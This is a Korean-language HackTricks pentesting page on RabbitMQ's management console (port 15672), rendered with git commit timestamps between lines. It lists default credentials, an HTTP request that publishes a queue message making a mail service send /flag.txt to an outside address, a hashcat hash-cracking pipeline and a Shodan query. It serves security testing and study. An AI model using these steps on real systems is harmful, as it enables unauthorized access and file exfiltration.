2024-02-18 14:48:35 +00:00
# 15672 - RabbitMQ 관리 Pentesting
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:46:17 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > 를 통해 제로부터 AWS 해킹을 전문가로 배우세요!< / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2024-01-03 10:42:55 +00:00
2024-05-05 22:46:17 +00:00
- **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제** ](https://github.com/sponsors/carlospolop )를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그** ](https://peass.creator-spring.com )를 구매하세요
- [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요, 당사의 독점 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션
- 💬 [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **가입**하거나 **트위터** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )를 **팔로우**하세요.
- **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
2022-04-28 16:01:33 +00:00
< / details >
2024-02-18 14:48:35 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-05-05 22:46:17 +00:00
**버그 바운티 팁**: **해커들에 의해 만들어진 프리미엄 버그 바운티 플랫폼**인 **Intigriti**에 **가입**하세요! [**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks)에서 오늘 ** $100,000**까지의 바운티를 벌 수 있습니다!
2022-05-24 00:07:19 +00:00
2024-02-18 14:48:35 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2024-02-10 21:30:13 +00:00
## 기본 정보
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
RabbitMQ에 대해 더 알아보려면 [**5671,5672 - AMQP Pentesting** ](5671-5672-pentesting-amqp.md )를 참조하세요.\
2024-02-18 14:48:35 +00:00
이 포트에서는 [관리 플러그인 ](https://www.rabbitmq.com/management.html )이 활성화되어 있다면 RabbitMQ 관리 웹 콘솔을 찾을 수 있습니다.\
2024-05-05 22:46:17 +00:00
메인 페이지는 다음과 같아야 합니다:
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
![](< .. / . gitbook / assets / image ( 336 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-10 21:30:13 +00:00
## 열거
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
기본 자격 증명은 "_**guest**_":"_**guest**_"입니다. 작동하지 않는 경우 [**로그인 브루트포스** ](../generic-methodologies-and-resources/brute-force.md#http-post-form )를 시도할 수 있습니다.
2020-07-15 15:43:14 +00:00
2024-02-10 21:30:13 +00:00
이 모듈을 수동으로 시작하려면 다음을 실행해야 합니다:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```
2024-05-05 22:46:17 +00:00
한 번 올바르게 인증되면 관리자 콘솔이 표시됩니다:
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
![](< .. / . gitbook / assets / image ( 441 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-18 14:48:35 +00:00
또한 유효한 자격 증명이 있다면 `http://localhost:15672/api/connections` 의 정보가 흥미로울 수 있습니다.
2020-07-15 15:43:14 +00:00
2024-02-18 14:48:35 +00:00
또한 이 서비스의 API를 사용하여 요청으로 **대기열 내에 데이터를 게시**하는 것이 가능하다는 점에 유의하십시오:
2020-07-15 15:43:14 +00:00
```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
2024-03-25 01:11:29 +00:00
## 해시 크래킹
```bash
echo < base64 rabbit mq hash > | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
```
2022-05-01 13:25:53 +00:00
### Shodan
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
* `포트:15672 http`
2022-04-28 16:01:33 +00:00
2024-02-18 14:48:35 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-03-25 01:11:29 +00:00
**버그 바운티 팁**: **Intigriti**에 가입하여 해커들이 만든 프리미엄 **버그 바운티 플랫폼**에 참여하세요! [**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks)에서 오늘 가입하고 최대 ** $100,000**의 바운티를 받아보세요!
2022-05-24 00:07:19 +00:00
2024-02-18 14:48:35 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:46:17 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요< / strong > !< / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2024-01-03 10:42:55 +00:00
2024-05-05 22:46:17 +00:00
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )를 확인하세요!
2024-03-25 01:11:29 +00:00
* [**공식 PEASS & HackTricks 스왜그** ](https://peass.creator-spring.com )를 구매하세요
2024-02-18 14:48:35 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요, 당사의 독점 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션
2024-05-05 22:46:17 +00:00
* 💬 [**디스코드 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **가입**하거나 **트위터** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**를 팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
2022-04-28 16:01:33 +00:00
< / details >